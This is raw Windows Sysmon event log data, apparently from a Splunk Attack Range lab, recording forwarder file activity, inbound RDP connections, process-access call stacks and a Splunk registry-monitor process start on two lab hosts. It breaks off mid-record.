09:12:20.240{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1E86F3CFB1A453570774FA7735C5B7A6,SHA256=B6BB3FC77B27F06A51B81E9079823D2F3799186A688F4554D655928E178839A0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000978901Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:12:21.858{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=54B59796C31DB4CA620F50257B13F7DB,SHA256=C377BDC9020DAE1DB226E85F6B65FC5868D15B7FDB343CC2C13F01806112FCF1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050280Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:12:21.255{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DAD5916B4F3E5BD3B5A1D7AEFC521272,SHA256=C6A8CA02DF93F05F5767163EC963E99F626D87F27C5CF2F6E529446C2FD0E92E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000978902Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:12:22.873{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F782543AE64F0085923D57FA2CC33001,SHA256=BA70745BE31DB335B1C8D290AA2ED34D9AB7F84E05BC9B856372B877D5BE5C93,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001050282Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:12:19.862{5EBD8912-7F4C-614D-6E00-00000000FC01}3728C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-429.attackrange.local53373-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x80000000000000001050281Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:12:22.308{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2D080F7518C5EF55045FB3FCF7323A1C,SHA256=B58C0E08C83A83AE972AC0B087D8C74C79017DD1D831E3336295550E645E8899,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000978904Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:12:23.888{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4ED23272502B4800658C657ED1F1CC00,SHA256=9B9093F831E11AD0BF4C14E046AA2D02E7428A8BE2FC16EE2C4667F6C17CED4A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050285Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:12:23.723{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=34AE8E569B2B115F2D2ED58F537E73F4,SHA256=2368C34153AB7294F4561C7830F1FA9271049BDFB797D07F8AE888BBE6C3A417,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050284Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:12:23.723{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=E743EEA2A7C91CF2ED90F66BC69F0E83,SHA256=65BD9BB040749FB80FF2FC012D3ACB907DF9F98F3ECF66599280470FD20C280C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050283Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:12:23.323{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C12E26907120E5E6179D94DAE8C0E479,SHA256=0487F959E716DFE4C7B9DF4EAAB118BB6FF747ED282396844BD44FAC186DCCDE,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000978903Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:12:19.703{69CF5F33-7F33-614D-6600-00000000FD01}4076C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-542.attackrange.local59391-false10.0.1.12-8000- 23542300x8000000000000000978905Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:12:24.904{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D016B687F185154EDF8B500444D94E2B,SHA256=583833BB7E6FD4174D675C49082E5DA5432D46C50FAE988767E63B0AAF4821E1,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001050287Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:12:22.101{5EBD8912-7F30-614D-0F00-00000000FC01}288C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.231-63761-false10.0.1.14win-dc-429.attackrange.local3389ms-wbt-server 23542300x80000000000000001050286Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:12:24.338{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4AFD3379D9E7CA3E46299B0034D62CAA,SHA256=D3EF54E32ABCFBBB73F80CA5467040259EAEEEFA12CB0B379FEAB0F01CDA6E8A,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000978923Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:12:25.935{69CF5F33-8AF9-6151-C779-00000000FD01}6841012C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{69CF5F33-7F29-614D-1D00-00000000FD01}1960C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000978922Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:12:25.920{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EC867849C95216C9CE54F947DCF8CF20,SHA256=844073135C1D99168AB546EB0BBDC5F705C4956E01245A76C8DBB84344DB6512,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050288Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:12:25.353{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5EA8FB75B954AF228847CE8F96A871C3,SHA256=A256197B8C46C6F1C3D365448D84690032C1AB9DBC66061DB4802CDA1B46DC99,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000978921Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:12:25.763{69CF5F33-7F2A-614D-2B00-00000000FD01}28562876C:\Windows\system32\conhost.exe{69CF5F33-8AF9-6151-C779-00000000FD01}684C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000978920Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:12:25.763{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000978919Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:12:25.763{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000978918Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:12:25.763{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000978917Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:12:25.763{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000978916Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:12:25.763{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000978915Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:12:25.763{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000978914Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:12:25.763{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000978913Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:12:25.763{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000978912Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:12:25.763{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000978911Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:12:25.763{69CF5F33-7F27-614D-0500-00000000FD01}408984C:\Windows\system32\csrss.exe{69CF5F33-8AF9-6151-C779-00000000FD01}684C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000978910Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:12:25.763{69CF5F33-7F29-614D-1D00-00000000FD01}19603060C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{69CF5F33-8AF9-6151-C779-00000000FD01}684C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000978909Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:12:25.749{69CF5F33-8AF9-6151-C779-00000000FD01}684C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{69CF5F33-7F27-614D-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{69CF5F33-7F29-614D-1D00-00000000FD01}1960C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000978908Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:12:25.482{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=CD6B8D26717406ED03128B734B075B7B,SHA256=0C080280D408420DC4B0BBC770DCE72616926E7296DC21F7B04619C2405BE216,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000978907Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:12:25.482{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=275FB3878BA19C5B528C1FD7F9C2FE11,SHA256=EDF6A093CE5FA485EBD575C9AE852FF15CAA236A6B85B8EB32B273EDBBB9126C,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000978906Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:12:22.433{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.230-55133-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 23542300x8000000000000000978939Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:12:26.920{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B3A89815B010ED92F7F8F9C5AEE3DBC7,SHA256=6AA2885ADBFD65048694E9044F29685CD32872D90C99518691F9B178516D7184,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001050292Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:12:24.929{5EBD8912-7F4C-614D-6E00-00000000FC01}3728C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-429.attackrange.local53374-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 354300x80000000000000001050291Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:12:24.268{5EBD8912-7F30-614D-0F00-00000000FC01}288C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.230-55718-false10.0.1.14win-dc-429.attackrange.local3389ms-wbt-server 23542300x80000000000000001050290Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:12:26.839{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=34AE8E569B2B115F2D2ED58F537E73F4,SHA256=2368C34153AB7294F4561C7830F1FA9271049BDFB797D07F8AE888BBE6C3A417,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050289Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:12:26.371{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7977350190E5142D1E9F6298E651F116,SHA256=A4BCDF76C65480DCE5D46C3457D631C1F960A8B8A1E4F94559D70E35AFA49071,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000978938Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:12:26.763{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=CD6B8D26717406ED03128B734B075B7B,SHA256=0C080280D408420DC4B0BBC770DCE72616926E7296DC21F7B04619C2405BE216,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000978937Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:12:26.560{69CF5F33-8AFA-6151-C879-00000000FD01}20001736C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{69CF5F33-7F29-614D-1D00-00000000FD01}1960C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program 